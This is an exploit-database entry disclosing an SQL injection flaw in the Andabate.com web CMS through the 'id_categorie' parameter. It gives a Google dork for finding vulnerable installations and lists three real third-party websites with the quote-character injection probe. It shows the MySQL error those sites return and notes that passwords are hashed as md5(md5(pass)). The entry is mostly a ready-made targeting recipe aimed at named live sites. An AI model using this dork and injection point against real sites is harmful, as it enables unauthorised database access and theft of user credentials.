1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
# Exploit Title: Andabate.com SQL Injection Vulnerability
# Author: magret
# Vendor or Software Link: Andabate.com
# Email: magret.canard@free.fr
# MSN: magret-2-canard@hotmail.fr
# ICQ: 585652602
# Category:: webapps
# Google dork: [inurl:"index.php?id_categorie="] " by www.Andabate.com ©"
# Tested on: [windows 7]
# Demo site:
http://www.habitech.fr/m_catalogue/index.php?id_categorie=10'
http://www.bulbargence.com/m_news/index.php?id_categorie=2'
http://www.sasvp.com/m_catalogue/index.php?id_categorie=30'
# Error : SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND clng.lang = "fr"' at line 1]
# Database mysql is version 4.0
=================================**FRENCH**=======================================
password is encrypted by: md5 (md5 ($ pass))
